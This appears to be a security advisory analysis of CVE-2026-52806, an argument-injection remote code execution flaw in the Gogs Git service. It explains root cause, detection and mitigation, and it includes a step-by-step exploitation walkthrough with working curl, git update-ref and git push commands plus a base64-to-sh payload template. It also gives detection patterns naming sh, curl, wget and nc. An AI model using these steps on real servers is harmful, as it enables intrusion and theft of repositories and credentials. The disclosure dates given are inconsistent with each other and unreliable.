CVE-2026-52806: 
Analyse et atténuation des vulnérabilités

CVE-2026-52806 is a critical Remote Code Execution (RCE) vulnerability in Gogs, the self-hosted Git service, caused by argument injection via a crafted branch name during pull request rebase merges. An authenticated attacker can inject the --exec flag into the git rebase command by naming a branch --exec=<payload>, causing arbitrary OS commands to execute as the Gogs process user. The vulnerability affects Gogs versions prior to 0.14.3, including the latest stable release 0.14.2 and development commit b53d3162. It was discovered by Jonah Burgess (CryptoCat) of Rapid7, published on June 19, 2026, and patched on June 23, 2026. It carries a CVSS v3.1 base score of 9.9 (Critical) (GitHub Advisory, Gogs Advisory).

The root cause is CWE-77 (Command Injection): in internal/database/pull.go, the Merge() function passes pr.BaseBranch directly to git rebase via process.ExecDir without a -- end-of-options separator, allowing branch names beginning with -- to be interpreted as git flags. The pr.BaseBranch value originates from a URL parameter and is validated only via git rev-parse --verify (which confirms the ref exists as a git object, not that it is argument-safe); since the attacker pushes the malicious branch themselves, this check passes. Git's --exec flag causes git rebase to execute a shell command via sh -c after each replayed commit, and ${IFS} is used to embed spaces in the payload while bypassing git's prohibition on spaces in branch names. For payloads requiring characters forbidden in git refs (e.g., :, |), the attacker base64-encodes the command: --exec=echo${IFS}<base64>|base64${IFS}-d|sh. The Merge() function bypasses the hardened git-module library (v1.8.7) because it uses raw process.ExecDir instead of the safe API, and the git rebase call was never migrated to use --end-of-options (GitHub Advisory, Fix Commit).

Successful exploitation grants the attacker arbitrary OS command execution as the Gogs process user (typically git), constituting a full privilege escalation from authenticated user to server-level access. On multi-tenant instances, this enables cross-tenant data breaches (reading all repositories including private ones), credential theft (database access to password hashes, API tokens, SSH keys, and 2FA secrets for all users), supply chain attacks (silent modification of any hosted repository's code), and lateral movement to other systems reachable from the server's network. Because Gogs ships with open registration enabled by default (DISABLE_REGISTRATION = false) and any user who creates a repository is automatically its admin, the effective attack surface extends to unauthenticated network attackers on default-configured instances (GitHub Advisory, Gogs Advisory).

1. Reconnaissance: Identify internet-facing Gogs instances running versions prior to 0.14.3 using Shodan, Censys, or by fingerprinting the Gogs version page. Confirm open registration is enabled (default).
2. Account creation: Register an account on the target Gogs instance (or use existing credentials). On default instances, self-registration is enabled.
3. Repository setup: Create a new repository via the Gogs API or web UI: curl -s -u attacker:Password123 -X POST http://target:3000/api/v1/user/repos -H 'Content-Type: application/json' -d '{"name":"demo"}'
4. Enable rebase merge: Navigate to the repository's Settings > Advanced and enable "Allow rebase" (or use the API). Any repo owner/admin can do this without site-admin intervention.
5. Create malicious branch: Locally, create a branch with a name that injects the --exec flag: git update-ref 'refs/heads/--exec=touch${IFS}/tmp/rce_proof' HEAD. For complex payloads (e.g., reverse shells), base64-encode the command: --exec=echo${IFS}<base64_payload>|base64${IFS}-d|sh
6. Push branches: Push the malicious base branch and a normal feature branch to the remote: git push origin master feature 'refs/heads/--exec=touch${IFS}/tmp/rce_proof:refs/heads/--exec=touch${IFS}/tmp/rce_proof'
7. Create pull request: Open a PR with the malicious branch as the base and the feature branch as the head via the compare URL (URL-encode the branch name).
8. Wait for mergeability: Wait ~5 seconds for the background TestPullRequests goroutine to mark the PR as mergeable (exploiting the race condition in testPatch()).
9. Trigger rebase merge: On the PR page, select "Rebase before merging" and click "Merge Pull Request". The server executes git rebase --quiet '--exec=<payload>' 'head_repo/feature', firing the RCE. The server returns HTTP 500 (expected), but the payload has already executed.
10. Verify/escalate: Confirm code execution (e.g., check for created file or reverse shell connection). Use the Gogs process user's filesystem access to read all repositories, the database, or pivot further (GitHub Advisory, Gogs Advisory).

• Logs: Gogs server error log entries at ERROR level matching the pattern: [E] ...merge: git checkout '--exec=<...>': exit status 128 - error: unknown option 'exec=<...>' — this is the signature left by the failed git checkout step after RCE has already fired.
• Logs: HTTP 500 responses to PR merge endpoints (e.g., POST /<user>/<repo>/pulls/<id>/merge) with Rebase before merging selected, especially from newly created repositories.
• File System: Unexpected files created in /tmp/ or other world-writable directories by the git process user (e.g., /tmp/rce_proof, /tmp/BROWSER_RCE_PROOF).
• File System: New scripts, cron jobs, or SSH authorized_keys modifications owned by the Gogs process user (git, UID 1000 in Docker).
• Network: Unexpected outbound connections (e.g., reverse shells, wget/curl to external hosts) originating from the Gogs server process.
• Process: Unusual child processes spawned by the Gogs process (e.g., sh, bash, curl, wget, nc) with command-line arguments containing base64-encoded strings or ${IFS} patterns.
• Repository: Presence of a branch in any repository whose name begins with --exec= or other git flag patterns (GitHub Advisory, Gogs Advisory).

Upgrade Gogs to version 0.14.3, which adds --end-of-options to the git rebase, git checkout, git merge, and git push invocations in Merge(), and rejects branch names starting with - at the Merge() entry point (Gogs Release, Fix Commit). If immediate upgrade is not possible, disable self-registration (DISABLE_REGISTRATION = true in app.ini) to prevent unauthenticated account creation, and disable the "Rebase before merging" option on all repositories. Additionally, restrict network access to the Gogs instance to trusted users only, and run the Gogs process with the minimum necessary OS privileges to limit the blast radius of exploitation.

The vulnerability was discovered and reported by Jonah Burgess (CryptoCat), Senior Security Researcher at Rapid7, who published a detailed technical blog post and a standalone Python PoC exploit (Rapid7 Blog). The advisory notes this is part of a recurring pattern of argument injection vulnerabilities in Gogs, representing an incomplete fix bypass of protections added in prior CVEs (CVE-2024-39933, CVE-2024-39932, CVE-2024-39930). The fix was merged promptly by Gogs maintainer unknwon on June 6, 2026, and released in v0.14.3 on June 7, 2026 (Fix PR). CTI aggregators such as CTI Pilot covered the vulnerability in their weekly briefs.